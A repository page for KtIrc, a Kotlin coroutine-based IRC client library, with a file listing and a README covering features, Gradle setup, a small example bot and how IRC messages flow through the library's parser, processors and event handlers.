436 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
437 struct iop13xx_adma_desc_ctrl desc_ctrl = hw_desc->desc_ctrl_field;
438 struct iop13xx_adma_byte_count byte_count = hw_desc->byte_count_field;
439
440 BUG_ON(!(byte_count.tx_complete && desc_ctrl.zero_result));
441
442 if (desc_ctrl.pq_xfer_en)
443 return byte_count.zero_result_err_q;
444 else
445 return byte_count.zero_result_err;
446 }
447
448 static inline void iop_chan_append(struct iop_adma_chan *chan)
449 {
450 u32 adma_accr;
451
452 adma_accr = __raw_readl(ADMA_ACCR(chan));
453 adma_accr |= 0x2;
454 __raw_writel(adma_accr, ADMA_ACCR(chan));
455 }
456
457 static inline void iop_chan_idle(int busy, struct iop_adma_chan *chan)
458 {
459 do { } while (0);
460 }
461
462 static inline u32 iop_chan_get_status(struct iop_adma_chan *chan)
463 {
464 return __raw_readl(ADMA_ACSR(chan));
465 }
466
467 static inline void iop_chan_disable(struct iop_adma_chan *chan)
468 {
469 u32 adma_chan_ctrl = __raw_readl(ADMA_ACCR(chan));
470 adma_chan_ctrl &= ~0x1;
471 __raw_writel(adma_chan_ctrl, ADMA_ACCR(chan));
472 }
473
474 static inline void iop_chan_enable(struct iop_adma_chan *chan)
475 {
476 u32 adma_chan_ctrl;
477
478 adma_chan_ctrl = __raw_readl(ADMA_ACCR(chan));
479 adma_chan_ctrl |= 0x1;
480 __raw_writel(adma_chan_ctrl, ADMA_ACCR(chan));
481 }
482
483 static inline void iop_adma_device_clear_eot_status(struct iop_adma_chan *chan)
484 {
485 u32 status = __raw_readl(ADMA_ACSR(chan));
486 status &= (1 << 12);
487 __raw_writel(status, ADMA_ACSR(chan));
488 }
489
490 static inline void iop_adma_device_clear_eoc_status(struct iop_adma_chan *chan)
491 {
492 u32 status = __raw_readl(ADMA_ACSR(chan));
493 status &= (1 << 11);
494 __raw_writel(status, ADMA_ACSR(chan));
495 }
496
497 static inline void iop_adma_device_clear_err_status(struct iop_adma_chan *chan)
498 {
499 u32 status = __raw_readl(ADMA_ACSR(chan));
500 status &= (1 << 9) | (1 << 5) | (1 << 4) | (1 << 3);
501 __raw_writel(status, ADMA_ACSR(chan));
502 }
503
504 static inline int
505 iop_is_err_int_parity(unsigned long status, struct iop_adma_chan *chan)
506 {
507 return test_bit(9, &status);
508 }
509
510 static inline int
511 iop_is_err_mcu_abort(unsigned long status, struct iop_adma_chan *chan)
512 {
513 return test_bit(5, &status);
514 }
515
516 static inline int
517 iop_is_err_int_tabort(unsigned long status, struct iop_adma_chan *chan)
518 {
519 return test_bit(4, &status);
520 }
521
522 static inline int
523 iop_is_err_int_mabort(unsigned long status, struct iop_adma_chan *chan)
524 {
525 return test_bit(3, &status);
526 }
527
528 static inline int
529 iop_is_err_pci_tabort(unsigned long status, struct iop_adma_chan *chan)
530 {
531 return 0;
532 }
533
534 static inline int
535 iop_is_err_pci_mabort(unsigned long status, struct iop_adma_chan *chan)
536 {
537 return 0;
538 }
539
540 static inline int
541 iop_is_err_split_tx(unsigned long status, struct iop_adma_chan *chan)
542 {
543 return 0;
544 }
545
546 #endif /* _ADMA_H */
547
This page was automatically generated by the LXR engine.
|
__label__pos
| 0.996951 |
Welcome :: Homework Help and Answers :: Mathskey.com
Welcome to Mathskey.com Question & Answers Community. Ask any math/science homework question and receive answers from other members of the community.
13,435 questions
17,804 answers
1,438 comments
108,772 users
Find the area of the region bounded by the given curves.y = 6x^2 ln x, y = 24 ln x?
+1 vote
Find the area of the region bounded by the given curves.y = 6x^2 ln x, y = 24 ln x?
asked Feb 5, 2013 in CALCULUS by futai Scholar
1 Answer
+2 votes
y = 6x2log x, y = 24 log x
24 log x - 6x2log x = 0
Multiply each side by negative one.
6x2log x - 24 log x = 0
Take out common term log x.
log x(6x2 - 24) = 0
log x = 0 and (6x2 - 24) = 0
log x = 0 then x = e0 ⇒ x = 0
6x2 - 24 = 0
Add 24 to each side.
6x2 = 24
Divide each side by 6.
x2 = 24 ⇒ x = ±2.
The two equation interval is (1, 2, -2)
In interval 1<x<2, y₂>y₁ which makes enclosed area A.
Top minus bottom
image
integrals with logarithms
image
image
image
image
image
image
image
image.
Therefore The area is -9.702.
answered Feb 6, 2013 by richardson Scholar
= 32 ln 2 - 24 + 14/3 (where, ln is the natutal logerthem)
= 32(0.69315) - 24 + 4.66
= 22.18 - 19.34
= 2.85.
The area of the region bounded by the curves y = 6x^ ln x and y = 24 ln x is 2.85 square units.
Related questions
...
|
__label__pos
| 0.779672 |
Comparing the properties of two objects via Reflection and C#
As part of the refactoring I was doing to the load code for crawler projects I needed a way of verifying that new code was loading data correctly. As it would be extremely time consuming to manually compare the objects, I used Reflection to compare the different objects and their properties. This article briefly describes the process and provides a complete helper function you can use in your own projects.
This code is loosely based on a Stack Overflow question, but I have heavily modified and expanded the original concept.
Obtaining a list of properties
The ability to analyze assemblies and their component pieces is directly built into the .NET Framework, and something I really appreciate - I remember the nightmares of trying to work with COM type libraries in Visual Basic many years ago!
The Type class represents a type declaration in your project, such as a class or enumeration. You can either use the GetType method of any object to get its underlying type, or use the typeof keyword to access a type from its type name.
Type typeA;
Type typeB;
int value;
value = 1;
typeA = value.GetType();
typeB = typeof(int);
Once you have a type, you can call the GetProperties method to return a list of PropertyInfo objects representing the available properties of the type. Several methods, including GetProperties, accept an argument of BindingFlags, these flags allow you to define the type of information return, such as public members or instance members.
In this case, I want all public instance members which can be read from and which are not included in a custom ignore list.
foreach (PropertyInfo propertyInfo in objectType.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Contains(p.Name)))
{
}
Retrieving the value of a property
The PropertyInfo class has a GetValue method that can be used to read the value of a property. Its most basic usage is to pass in the instance object (or null if you want to read a static property) and any index parameters (or null if no index parameters are supported).
object valueA;
object valueB;
valueA = propertyInfo.GetValue(objectA, null);
valueB = propertyInfo.GetValue(objectB, null);
The sample function described in this article doesn't currently support indexed properties.
Determining if a property can be directly compared
Some properties are simple types, such as an int or a string and are very easy to compare. What happens if a property returns some other object such as a collection of strings, or a complex class?
In this case, I try and see if the type supports IComparable by calling the IsAssignableFrom method. You need to call this from the type you would like to create, passing in the source type.
return typeof(IComparable).IsAssignableFrom(type)
I also check the IsPrimitive and IsValueType properties of the source type, although this is possibly redundant as all the base types I've checked so far all support IComparable.
Directly comparing values
Assuming that I can directly compare a value, first I check if one of the values is null - if one value is null and one false, I immediately return a mismatch.
Otherwise, if IComparable is available, then I obtain an instance of it from the first value and call its CompareTo method, passing in the second value.
If IComparable is not supported, then I fallback to object.Equals.
bool result;
IComparable selfValueComparer;
selfValueComparer = valueA as IComparable;
if (valueA == null && valueB != null || valueA != null && valueB == null)
result = false; // one of the values is null
else if (selfValueComparer != null && selfValueComparer.CompareTo(valueB) != 0)
result = false; // the comparison using IComparable failed
else if (!object.Equals(valueA, valueB))
result = false; // the comparison using Equals failed
else
result = true; // match
return result;
Comparing objects
If the values could not be directly compared, and do not implement IEnumerable (as described in the next section) then I assume the properties are objects and call the compare objects function again on the properties.
This works nicely, but has one critical flaw - if you have a child object which has a property reference to a parent item, then the function will get stuck in a recursive loop. Currently the only workaround is to ensure that such parent properties are excluded via the ignore list functionality of the compare function.
Comparing collections
If the direct compare check failed, but the property type supports IEnumerable, then some Linq is used to obtain the collection of items.
To save time, a count check is made and if the counts do not match (or one of the collections is null and the other is not), then an automatic mismatch is returned. If the counts do match, then all items are compared in the same manner as the parent objects.
IEnumerable<object> collectionItems1;
IEnumerable<object> collectionItems2;
int collectionItemsCount1;
int collectionItemsCount2;
collectionItems1 = ((IEnumerable)valueA).Cast<object>();
collectionItems2 = ((IEnumerable)valueB).Cast<object>();
collectionItemsCount1 = collectionItems1.Count();
collectionItemsCount2 = collectionItems2.Count();
I have tested this code on generic lists such as List<string>, and on strongly typed collections which inherit from Collection<TValue> with success.
The code
Below is the comparison code. Please note that it won't handle all situations - as mentioned indexed properties aren't supported. In addition, if you throw a complex object such as a DataReader I suspect it will throw a fit on that. I also haven't tested it on generic properties, it'll probably crash on those too. But it has worked nicely for the original purpose I wrote it for.
Also, as I was running this from a Console application, you may wish to replace the calls to Console.WriteLine with either Debug.WriteLine or even return them as an out parameter.
/// <summary>
/// Compares the properties of two objects of the same type and returns if all properties are equal.
/// </summary>
/// <param name="objectA">The first object to compare.</param>
/// <param name="objectB">The second object to compre.</param>
/// <param name="ignoreList">A list of property names to ignore from the comparison.</param>
/// <returns><c>true</c> if all property values are equal, otherwise <c>false</c>.</returns>
public static bool AreObjectsEqual(object objectA, object objectB, params string[] ignoreList)
{
bool result;
if (objectA != null && objectB != null)
{
Type objectType;
objectType = objectA.GetType();
result = true; // assume by default they are equal
foreach (PropertyInfo propertyInfo in objectType.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Contains(p.Name)))
{
object valueA;
object valueB;
valueA = propertyInfo.GetValue(objectA, null);
valueB = propertyInfo.GetValue(objectB, null);
// if it is a primitive type, value type or implements IComparable, just directly try and compare the value
if (CanDirectlyCompare(propertyInfo.PropertyType))
{
if (!AreValuesEqual(valueA, valueB))
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
// if it implements IEnumerable, then scan any items
else if (typeof(IEnumerable).IsAssignableFrom(propertyInfo.PropertyType))
{
IEnumerable<object> collectionItems1;
IEnumerable<object> collectionItems2;
int collectionItemsCount1;
int collectionItemsCount2;
// null check
if (valueA == null && valueB != null || valueA != null && valueB == null)
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
else if (valueA != null && valueB != null)
{
collectionItems1 = ((IEnumerable)valueA).Cast<object>();
collectionItems2 = ((IEnumerable)valueB).Cast<object>();
collectionItemsCount1 = collectionItems1.Count();
collectionItemsCount2 = collectionItems2.Count();
// check the counts to ensure they match
if (collectionItemsCount1 != collectionItemsCount2)
{
Console.WriteLine("Collection counts for property '{0}.{1}' do not match.", objectType.FullName, propertyInfo.Name);
result = false;
}
// and if they do, compare each item... this assumes both collections have the same order
else
{
for (int i = 0; i < collectionItemsCount1; i++)
{
object collectionItem1;
object collectionItem2;
Type collectionItemType;
collectionItem1 = collectionItems1.ElementAt(i);
collectionItem2 = collectionItems2.ElementAt(i);
collectionItemType = collectionItem1.GetType();
if (CanDirectlyCompare(collectionItemType))
{
if (!AreValuesEqual(collectionItem1, collectionItem2))
{
Console.WriteLine("Item {0} in property collection '{1}.{2}' does not match.", i, objectType.FullName, propertyInfo.Name);
result = false;
}
}
else if (!AreObjectsEqual(collectionItem1, collectionItem2, ignoreList))
{
Console.WriteLine("Item {0} in property collection '{1}.{2}' does not match.", i, objectType.FullName, propertyInfo.Name);
result = false;
}
}
}
}
}
else if (propertyInfo.PropertyType.IsClass)
{
if (!AreObjectsEqual(propertyInfo.GetValue(objectA, null), propertyInfo.GetValue(objectB, null), ignoreList))
{
Console.WriteLine("Mismatch with property '{0}.{1}' found.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
else
{
Console.WriteLine("Cannot compare property '{0}.{1}'.", objectType.FullName, propertyInfo.Name);
result = false;
}
}
}
else
result = object.Equals(objectA, objectB);
return result;
}
/// <summary>
/// Determines whether value instances of the specified type can be directly compared.
/// </summary>
/// <param name="type">The type.</param>
/// <returns>
/// <c>true</c> if this value instances of the specified type can be directly compared; otherwise, <c>false</c>.
/// </returns>
private static bool CanDirectlyCompare(Type type)
{
return typeof(IComparable).IsAssignableFrom(type) || type.IsPrimitive || type.IsValueType;
}
/// <summary>
/// Compares two values and returns if they are the same.
/// </summary>
/// <param name="valueA">The first value to compare.</param>
/// <param name="valueB">The second value to compare.</param>
/// <returns><c>true</c> if both values match, otherwise <c>false</c>.</returns>
private static bool AreValuesEqual(object valueA, object valueB)
{
bool result;
IComparable selfValueComparer;
selfValueComparer = valueA as IComparable;
if (valueA == null && valueB != null || valueA != null && valueB == null)
result = false; // one of the values is null
else if (selfValueComparer != null && selfValueComparer.CompareTo(valueB) != 0)
result = false; // the comparison using IComparable failed
else if (!object.Equals(valueA, valueB))
result = false; // the comparison using Equals failed
else
result = true; // match
return result;
}
I hope you find these helper methods useful, this article will be updated if and when the methods are expanded with new functionality.
Update History
• 2010-11-05 - First published
• 2020-11-21 - Updated formatting
About The Author
Gravatar
The founder of Cyotek, Richard enjoys creating new blog content for the site. Much more though, he likes to develop programs, and can often found writing reams of code. A long term gamer, he has aspirations in one day creating an epic video game. Until that time, he is mostly content with adding new bugs to WebCopy and the other Cyotek products.
Leave a Comment
While we appreciate comments from our users, please follow our posting guidelines. Have you tried the Cyotek Forums for support from Cyotek and the community?
Styling with Markdown is supported
Comments
DotNetKicks.com
# Reply
[b]Comparing the properties of two objects via Reflection and C#[/b] You've been kicked (a good thing) - Trackback from DotNetKicks.com - Trackback from DotNetKicks.com
DotNetShoutout
# Reply
[b]Comparing the properties of two objects via Reflection and C#[/b] Thank you for submitting this cool story - Trackback from DotNetShoutout - Trackback from DotNetShoutout
Gravatar
Calabonga
# Reply
That`s cool! Thanks! But reflection is very slow...:)
sv
# Reply
System.StackOverflowException occurs if objects has circular references properties
Gravatar
Richard Moss
# Reply
Hello,
Yes it will - this is why the method supports the ignoreList array - any properties found matching values in this array will be skipped. This is sufficient for the purposes I was using this code for.
Regards; Richard Moss
anantharengan
# Reply
Thanks a lot
Gravatar
Jason
# Reply
How about List? Fails on
valueA = propertyInfo.GetValue( objectA, null );
Gravatar
Knoxi
# Reply
I'm wondering if someone solved the problem about List? This would be great!
Gravatar
Richard Moss
# Reply
Hello,
I haven't looked into this yet, I'll take a look and see what's wrong over the weekend.
Regards; Richard Moss
Suri
# Reply
This is a nice post. Helped a lot with this quick solution I've been looking for: which will be a "object value comparer utility" for my project. Thanks a lot.
Gravatar
Richard Moss
# Reply
Glad you found it helpful!
Suri
# Reply
I just added a few more simple lines of code for my requirement at the beginning to do some extra checks to avoid the loop:
bool result;
if (objectActual != null && objectModified != null)
{
Type objectTypeActual;
Type objectTypeModified;
result = true; // assume by default they are equal
objectTypeActual = objectActual.GetType();
objectTypeModified = objectModified.GetType();
if(objectTypeActual.FullName != objectTypeModified.FullName)
{
Console.WriteLine("Objects are of different type. Cannot Compare '{0}' & '{1}'.", objectTypeActual.FullName, objectTypeActual.FullName);
result = false;
return result;
}
var allPropertyInfos = objectTypeActual.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Any(x => x.Contains(p.Name)));
var allPropertyInfosModified = objectTypeModified.GetProperties(BindingFlags.Public | BindingFlags.Instance).Where(p => p.CanRead && !ignoreList.Any(x => x.Contains(p.Name)));
if (allPropertyInfos.Count == 0 && allPropertyInfosModified.Count == 0)
{
Console.WriteLine("There are no properties in these objects to compare. These are both equal.);
result = true;
return result;
}
if (allPropertyInfos.Count <= 0)
{
Console.WriteLine("Object of type '{0}' does not have any properties to Compare.", objectTypeActual.FullName);
result = false;
return result;
}
if (allPropertyInfosModified.Count <= 0)
{
Console.WriteLine("Object of type '{0}' does not have any properties to Compare.", objectTypeModified.FullName);
result = false;
return result;
}
foreach (PropertyInfo propertyInfo in allPropertyInfos)
{ .....
aadilah
# Reply
Dictionary not supported.
Gravatar
John Campbell
# Reply
Did you ever get around to taking a look at the problem about List failing on
valueA = propertyInfo.GetValue( objectA, null );
?
Apart from that it's very useful little routine :-)
Sujith
# Reply
Thanks a lot for this code. It saved my time
Dmitry
# Reply
thank! It works for me. I use comparator for unit test
Gravatar
cassini
# Reply
how about to edit one object if there is a missmatch between objects...how can i remove a element from a property list ? :((
Vijay
# Reply
Thank you! Great article. Saved me tons of time.
J-S
# Reply
May I suggest that you exit the loop as soon as possible when results == false as there is absolutely no need to continue since the answer is already found and more importantly because we're using "costly" algorithm (reflection)?
Gravatar
Richard Moss
# Reply
Hello,
You're right of course, but actually I did that deliberately. This was because I wrote this code for use in testing (quite often I don't add IEquatable or IComparable to my classes) and I remember specifically getting really annoyed when tests would fail, I'd fix the first mismatch, but then I'd have to wait for them to run again to get the next. By not breaking out of that loop early I could get all mismatches at once and then fix them at once - I was never worried about the inefficiency as it was "just" testing.
Regards; Richard Moss
Gravatar
Babuji Godem
# Reply
Great article.
Gravatar
Software Engineer
# Reply
Still a great resource for understanding reflection. Thanks for sharing!
|
__label__pos
| 0.647342 |
Brave "Multi-agent system" "Framework"
(the article is wrote using ChatGPT mostly)
Hello Brave community,
I am writing to request that the Brave browser consider integrating a multi-agent system framework, specifically for different AI’s. A multi-agent system is a decentralized system composed of multiple interacting intelligent agents, where each agent is autonomous and able to perceive its environment and take actions based on its own decision-making.
Having a multi-agent system framework in the Brave browser would enable AI agents to communicate and collaborate with each other, allowing for more advanced and efficient functionality. For example, an AI agent focused on security could work together with an AI agent focused on browsing history to provide more comprehensive privacy protection for the user. Additionally, an AI agent focused on content filtering could work with an AI agent focused on personalized recommendations to provide a more seamless browsing experience.
The integration of a multi-agent system framework would also provide an open platform for third-party developers to create and integrate their own AI agents, further expanding the capabilities of the Brave browser. This would also provide a way to improve the user experience by creating the perfect balance between user privacy and security and the ability to provide personalized and relevant content.
This integration of multi-agent system framework with Brave browser would open a new horizon for the Brave community and AI researchers. There would be a lot of possibilities to explore in this direction such as creating a decentralized AI network, creating a more efficient and faster browsing experience, having a more sophisticated security system, and many more.
I believe this feature would be a valuable addition to the Brave browser and would greatly benefit the community. I would appreciate any feedback or suggestions on how to move forward with this request, and also if there is any existing work that Brave team is doing in this direction.
Thank you for your time and consideration.
Best,
Priyanshu Joshi
|
__label__pos
| 0.920272 |
Designly Blog
Building an AI Search App with Next.js and OpenAI: A Step-by-step Guide
Building an AI Search App with Next.js and OpenAI: A Step-by-step Guide
Posted in Full-Stack Development by Jay Simons
Published on July 9, 2023
In the burgeoning era of artificial intelligence and machine learning, harnessing the power of AI to enhance the capabilities of your web application is no longer a luxury, but a necessity. As developers and data scientists, the onus is on us to stay updated with the dynamic landscape of technology and to create the most efficient and effective tools for our end-users.
Today, we're taking a deep dive into the realm of AI-driven searches, using a powerful tech stack comprising Next.js, Sequelize, PostgreSQL, pgvector, and the OpenAI API. This comprehensive guide aims to equip you with the know-how to build a Next.js application that leverages these robust technologies to deliver advanced, AI-powered searches.
Semantic Similarity
So how does a vector search work? Here are the steps:
1. Vectorization: First, the text (or other data) is converted into vectors. This process, also known as "embedding", uses algorithms such as Word2Vec, FastText, BERT, or other transformers that can capture the context and semantic meaning of words or phrases and represent it in a numerical format. Each unique word or phrase is assigned a unique vector, which is just a set of numbers in a high-dimensional space.
2. Indexing: After converting the data to vectors, these vectors are stored in a vector database or a vector index. This index allows us to perform efficient nearest neighbor searches.
3. Nearest Neighbor Search: When a new query comes in, it's also converted into a vector using the same process. Then, the system performs a nearest neighbor search to find vectors that are closest to the query vector. The logic behind this is that semantically similar items will be closer in the vector space. The system uses measures such as cosine similarity or Euclidean distance to determine which vectors (and therefore which objects) are most similar to the query.
4. Return Results: The items associated with the nearest vectors are returned as the search results.
Project Requirements
We will need several packages to implement sematic search in our Next.js app:
1. pg: the node.js Postgres library
2. pg-hstore: A node package for serializing and deserializing JSON data to hstore format
3. pgvector: a simple NPM package for handing the vector data type in pg and sequelize
4. sequelize: a fantastic ORM (Object Relational Mapping) package
The project is bootstrapped using create-next-app@latest with typescript, tailwind and app router.
Step 1 - Create our ORM model and seed the database
First we need to define our Sequelize model. We'll start by creating a utility function to initialize Sequelize with the Postgres dialect:
// sequelize.ts
import { Sequelize } from 'sequelize';
import pg from 'pg';
import safe from 'colors';
const pgvector = require('pgvector/sequelize');
pgvector.registerType(Sequelize);
const logQuery = (query: string, options: any) => {
console.log(safe.bgGreen(new Date().toLocaleString()));
console.log(safe.bgYellow(options.bind));
console.log(safe.bgBlue(query));
return options;
}
const sequelize = new Sequelize(
process.env.DB_NAME!, // DB name
process.env.DB_USER!, // username
process.env.DB_PASS!, // password
{
host: process.env.DB_HOST,
port: parseInt(process.env.DB_PORT!, 5432),
dialect: 'postgres',
dialectModule: pg,
dialectOptions: {
ssl: {
require: true,
rejectUnauthorized: false
}
},
logging: process.env.NODE_ENV !== 'production' ? logQuery : false,
}
);
export default sequelize;
Note that we are calling registerType from the pgvector package. This gives the VECTOR data type to our model which we will define next:
// Product.model.ts
import sequelize from "@/utils/sequelize";
import { createEmbedding } from "@/utils/openai";
const pgvector = require('pgvector/utils');
// Types
import { DataTypes, Model } from "sequelize";
import { T_Product } from "./products";
class Product extends Model implements T_Product {
public id!: number;
public name!: string;
public slug!: string;
public description!: string;
public price!: number;
public image!: string;
public category!: string;
public embedding!: number[];
public createdAt!: Date;
public updatedAt!: Date;
public static async publicSearch(searchTerm: string, skip: number = 0, limit: number = 9999) {
const embedding = await createEmbedding(searchTerm);
const embSql = pgvector.toSql(embedding);
const results = await Product.findAll({
order: [
sequelize.literal(`"embedding" <-> '${embSql}'`),
],
offset: skip,
limit: limit,
attributes: {
exclude: ['embedding']
}
});
return results;
}
public static initModel(): void {
Product.init({
id: {
type: DataTypes.UUID,
defaultValue: DataTypes.UUIDV4,
primaryKey: true,
},
name: {
type: DataTypes.STRING,
allowNull: false,
},
slug: {
type: DataTypes.STRING,
allowNull: false,
},
description: {
type: DataTypes.TEXT,
allowNull: false,
},
price: {
type: DataTypes.INTEGER,
allowNull: false,
},
image: {
type: DataTypes.TEXT,
allowNull: false,
},
category: {
type: DataTypes.STRING,
allowNull: false,
},
embedding: {
// @ts-ignore
type: DataTypes.VECTOR(1536),
allowNull: true,
defaultValue: null
}
}, {
sequelize,
tableName: 'products',
timestamps: true,
paranoid: true,
underscored: true,
});
}
}
Product.initModel();
Product.addHook('beforeCreate', async (product: Product) => {
const input = product.name + '\n' + product.category + '\n' + product.description;
const embedding = await createEmbedding(input);
product.embedding = embedding;
if (product.price) {
product.price = parseInt(product.price.toString().replace('.', ''));
}
});
Product.addHook('beforeUpdate', async (product: Product) => {
const input = product.name + '\n' + product.category + '\n' + product.description;
const embedding = await createEmbedding(input);
product.embedding = embedding;
if (product.changed('price')) {
product.price = parseInt(product.price.toString().replace('.', ''));
}
});
export default Product;
Here, we've established a unique column named 'embedding', which has a type of VECTOR. Subsequently, we design a method called search that takes our query and transforms it into an embedding vector. Utilizing the toSql helper function from pgvector, we formulate our query. Instead of applying a where clause, we sort the outcomes using the <-> operator, an operator for comparing Euclidean distances. As a result, the results most pertinent semantically will appear first. We have the option to add pagination or limit the results, but our mock store contains only 20 products.
Additionally, we establish a beforeCreate and beforeUpdate hook that forms an embedding. We string together the product name, category, and description, and feed it into our OpenAI helper function, createEmbedding:
// openai.ts
import { Configuration, OpenAIApi } from "openai";
const config = new Configuration({
apiKey: process.env.OPENAI_KEY,
organization: process.env.OPENAI_ORG,
});
// Create embedding from string
export const createEmbedding = async (text: string) => {
const openai = new OpenAIApi(config);
const response = await openai.createEmbedding({
model: 'text-embedding-ada-002',
input: text,
});
return response.data.data[0].embedding;
}
In this approach, we employ the openai library to send a request to the text-embedding-ada-002 model, which is considered the superior embeddings model at the time of this writing. The process is fairly quick, typically requiring less than a second.
Now let's write a script to seed our database. We will be using fakestoreapi.com to get our data:
import Product from "@/models/Products.model";
import { createSlug } from "./format";
const seedProducts = async (): Promise<void> => {
try {
const response = await fetch('https://fakestoreapi.com/products');
if (!response.ok) {
throw new Error('Failed to fetch products');
}
const products = await response.json();
const productsData = products.map((product: any) => ({
name: product.title,
slug: createSlug(product.title),
description: product.description,
price: parseInt(product.price.toString().replace('.', '')),
image: product.image,
category: product.category,
}));
await Product.sync({ alter: true });
console.log('Product model synced!');
await Product.destroy({
where: {},
force: true,
});
console.log('All products deleted!');
for (const product of productsData) {
await Product.create(product);
}
console.log('Products seeded!');
} catch (err) {
console.log(err);
}
}
export default seedProducts;
This process will retrieve all 20 products from the mock store API. Afterward, it will initialize and/or empty our table, and then create a record for each product. Via our customized Sequelize hooks, an embedding will be automatically computed for each product!
And there you have it - quite straightforward! For the complete code of this sample project, you can check out the repository link provided below. Don't hesitate to clone it and give it a try!
Resources
1. GitHub Repo
2. Demo Site
Thank you for taking the time to read my article and I hope you found it useful (or at the very least, mildly entertaining). For more great information about web dev, systems administration and cloud computing, please read the Designly Blog. Also, please leave your comments! I love to hear thoughts from my readers.
I use Hostinger to host my clients' websites. You can get a business account that can host 100 websites at a price of $3.99/mo, which you can lock in for up to 48 months! It's the best deal in town. Services include PHP hosting (with extensions), MySQL, Wordpress and Email services.
Looking for a web developer? I'm available for hire! To inquire, please fill out a contact form.
Loading comments...
|
__label__pos
| 0.998934 |
Sign up ×
TeX - LaTeX Stack Exchange is a question and answer site for users of TeX, LaTeX, ConTeXt, and related typesetting systems. It's 100% free, no registration required.
My document contains many short, justified lines, so the lines often appear with many spaces between words, e.g.:
These words have a space
so that they can fit nicely into the
available line.
In most situations, this is no problem, however, there are some select situations where I want a group of two or more words to appear together, even if other words in the lines are pulled apart, e.g., with "these words" linked:
These words have a space
so that they can fit nicely into the
available line.
How can this be done?
I'm looking for either a ConTeXt or TeX solution.
share|improve this question
1 Answer 1
up vote 14 down vote accepted
\hbox{These words} will do. Or, if you prefer a macro,
\def\nespace{\hskip\fontdimen2\font\relax}
and
These\nespace words
This space has no stretch or shrink component, but is the same as the normal interword space. If you want to add shrinkability:
\def\nespace{\hskip\fontdimen2\font minus\fontdimen4\font\relax}
The main difference between the \hbox approach and \nespace is that a line break can be taken at \nespace. Shouldn't you want it, just add \nobreak before \hskip as glue is not a feasible break point if preceded by discardable items and \nobreak adds a penalty, which is discardable.
share|improve this answer
1
How about line breaks? Are they permitted at \nespace? – lockstep Apr 14 '12 at 12:19
1
@lockstep Yes, of course: any glue is a feasible line break point if it's not preceded by discardable items. In order not to break, one can add \nobreak before \hskip. – egreg Apr 14 '12 at 12:21
1
In that case, please point out the difference to \hbox in your answer. – lockstep Apr 14 '12 at 12:22
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.895871 |
Main Content
Constant
Generate constant value
• Library:
• Simulink / Commonly Used Blocks
Simulink / Sources
DSP System Toolbox / Sources
HDL Coder / Commonly Used Blocks
HDL Coder / Sources
• Constant block
Description
The Constant block generates a real or complex constant value signal. Use this block to provide a constant signal input. The block generates scalar, vector, or matrix output, depending on:
• The dimensionality of the Constant value parameter
• The setting of the Interpret vector parameters as 1-D parameter
The output of the block has the same dimensions and elements as the Constant value parameter. If you specify for this parameter a vector that you want the block to interpret as a vector, select the Interpret vector parameters as 1-D check box. Otherwise, if you specify a vector for the Constant value parameter, the block treats that vector as a matrix.
Tip
To output a constant enumerated value, consider using the Enumerated Constant (Simulink) block instead. The Constant block provides block parameters that do not apply to enumerated types, such as Output minimum and Output maximum.
Using Bus Objects as the Output Data Type
The Constant block supports nonvirtual buses as the output data type. Using a bus object as the output data type can help simplify your model. If you use a bus object as the output data type, set the Constant value to 0 or to a MATLAB® structure that matches the bus object.
Using Structures for the Constant Value of a Bus
The structure you specify must contain a value for every element of the bus represented by the bus object. The block output is a nonvirtual bus signal.
You can use the Simulink.Bus.createMATLABStruct (Simulink) to create a full structure that corresponds to a bus.
You can use Simulink.Bus.createObject (Simulink) to create a bus object from a MATLAB structure.
If the signal elements in the output bus use numeric data types other than double, you can specify the structure fields by using typed expressions such as uint16(37) or untyped expressions such as 37. To control the field data types, you can use the bus object as the data type of a Simulink.Parameter object. To decide whether to use typed or untyped expressions, see Control Data Types of Initial Condition Structure Fields (Simulink).
Setting Configuration Parameters to Support Using a Bus Object Data Type
To enable the use of a bus object as an output data type, before you start a simulation, set Configuration Parameters > Diagnostics > Data Validity > Advanced parameters > Underspecified initialization detection to Simplified. For more information, see Underspecified initialization detection (Simulink).
Ports
Output
expand all
Constant value, specified as a real or complex valued scalar, vector, matrix, or N-D array. By default, the Constant block outputs a signal whose dimensions, data type, and complexity are the same as those of the Constant value parameter. However, you can specify the output to be any data type that Simulink® supports, including fixed-point and enumerated data types.
Note
If you specify a bus object as the data type for this block, do not set the maximum value for bus data on the block. Simulink ignores this setting. Instead, set the maximum values for bus elements of the bus object specified as the data type. For more information, see Simulink.BusElement (Simulink).
Data Types: single | double | half | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | Boolean | fixed point | enumerated | bus
Parameters
expand all
Main
Specify the constant value output of the block.
• You can enter any expression that MATLAB evaluates as a matrix, including the Boolean keywords true and false.
• If you set the Output data type to be a bus object, you can specify one of these options:
• A full MATLAB structure corresponding to the bus object
• 0 to indicate a structure corresponding to the ground value of the bus object
For details, see Using Bus Objects as the Output Data Type.
• For nonbus data types, Simulink converts this parameter from its value data type to the specified output data type offline, using a rounding method of nearest and overflow action of saturate.
Programmatic Use
Block Parameter: Value
Type: character vector
Value: scalar | vector | matrix | N-D array
Default: '1'
Select this check box to output a vector of length N if the Constant value parameter evaluates to an N-element row or column vector.
• When you select this check box, the block outputs a vector of length N if the Constant value parameter evaluates to an N-element row or column vector. For example, the block outputs a matrix of dimension 1-by-N or N-by-1.
• When you clear this check box, the block does not output a vector of length N if the Constant value parameter evaluates to an N-element row or column vector.
Programmatic Use
Block Parameter: VectorParams1D
Type: character vector
Values: 'on' | 'off'
Default: 'on'
Specify the interval between times that the Constant block output can change during simulation (for example, due to tuning the Constant value parameter).
The default value of inf indicates that the block output can never change. This setting speeds simulation and generated code by avoiding the need to recompute the block output.
See Specify Sample Time (Simulink) for more information.
Programmatic Use
Block Parameter: SampleTime
Type: character vector
Values: scalar | vector
Default: 'inf'
Signal Attributes
Specify the lower value of the output range that Simulink checks as a finite, real, double, scalar value.
Note
